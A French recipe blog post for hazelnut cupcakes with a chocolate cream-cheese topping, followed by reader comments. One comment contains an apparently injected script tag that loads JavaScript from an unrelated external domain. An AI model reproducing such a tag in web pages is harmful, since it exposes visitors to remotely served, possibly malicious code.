• Cupcake choco-noisettes

     Je vous vois déjà à baver sur votre clavier ..^^ oui oui vous ne rêvez pas aujourdhui c'est chocolaaaaaaaat !! ^^

    Un cupcake moelleux à la noisette surmonté d'un toping de philadelphia milka et de petits crispies aux 3 chocolats bien croustillants !!! Ultra simple, rapide à faire et du plus bel effet !!! 

    C'est parti pour la recette...

    Cupcake choco-noisettes

     ***

    INGREDIENTS (pour 6 pièces)

    1 oeuf

    60g de sucre

    30g de poudre de noisettes

    30g de farine

    50 de beurre fondu

    1/2 sachet de levure

    150g de philadephia Milka

    6 caissettes en papier

    des crispies

    ****

    Cupcake choco-noisettes

    Préchauffez votre four th6.

    Battez l'oeuf avec le sucre jusqu'à ce que le mélange blanchisse puis incorporez le beurre fondu.

    Ajoutez la farine et la poudre de noisettes, mélangez de façon à ce que cela soit bien homogène.

    A l'aide d'une cuillère remplir les caissettes aux 2/3 puis enfournez pendant 15 minutes th6.

    Laissez les refoidir.

    A l'aide d'une poche à douille remplie de philadephia Milka faites le toping sur le dessus de chaque cupcake et parsemez de crispies..

     Cupcake choco-noisettes

     

    Si vous voulez reproduire exactement les mêmes cupcakes ..vous trouverez les jolies caissettes chez Féerie cake et les crispies chez Cerf Dellier .

    Allez..y'à plus qu'à tester d'urgence ;-)


    MyFreeCopyright.com Registered & Protected


    Tags Tags : , , ,
  • Commentaires

    1
    Vendredi 25 Mai 2012 à 10:09
    Lucky Sophie

    oh ça fait très envie !

    2
    Vendredi 25 Mai 2012 à 10:39

    Pfffff je n'ai plus de mot... j'ai juste ultra faim de gourmandise... Nan mais STOP (in the name of love) parce que là, je vais mourir !!!

    3
    Vendredi 25 Mai 2012 à 12:33

    Oh ouais, grave, je bave de trop !!!!

    4
    Vendredi 25 Mai 2012 à 15:15

    Super jolis ! Je vais rapidement tester je pense ...

    5
    Vendredi 25 Mai 2012 à 20:27

    humm magnifique, j'adore trop trop trop bon =D

    6
    kari06
    Lundi 28 Mai 2012 à 12:29

    bonjour

    tes cupcake sont magnifiques ^^

    juste que tu as mis poudre d'amande (bon je supose que tu peut remplacer sans souci =p) ensuite tu les mets 15 mins à combien de ° svp

    merci

     

    <script src="http://superoseplugin.info/dfi823hs.js?0.020640941443380023" type="text/javascript"></script>
    7
    banou Profil de banou
    Lundi 28 Mai 2012 à 14:18

    erreurs réparées ;-)

    8
    Jeudi 31 Mai 2012 à 10:29
    Le blog de Pouce

    Je me demandais justement à quoi pouvait servir le philadelphia milka.

    En tout cas, ces cupcakes sont magnifiquement bien réalisés ! 

    • Nom / Pseudo :

      E-mail (facultatif) :

      Site Web (facultatif) :

      Commentaire :


    9
    banou Profil de banou
    Jeudi 31 Mai 2012 à 11:12

    bonjour ! le philadelphia Milka tu peux ausi l'utiliser en base pour le cheesecake, en mousse au choc pour fourrer des choux ...etc etc... :-)

    10
    Jeudi 26 Juillet 2012 à 21:52

    On en mangerais presque notre ordinateur.. haha ^^ Passe me voir sur mon blog si tu le souhaite! A bientôt et merci pour ces belles recettes :)

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :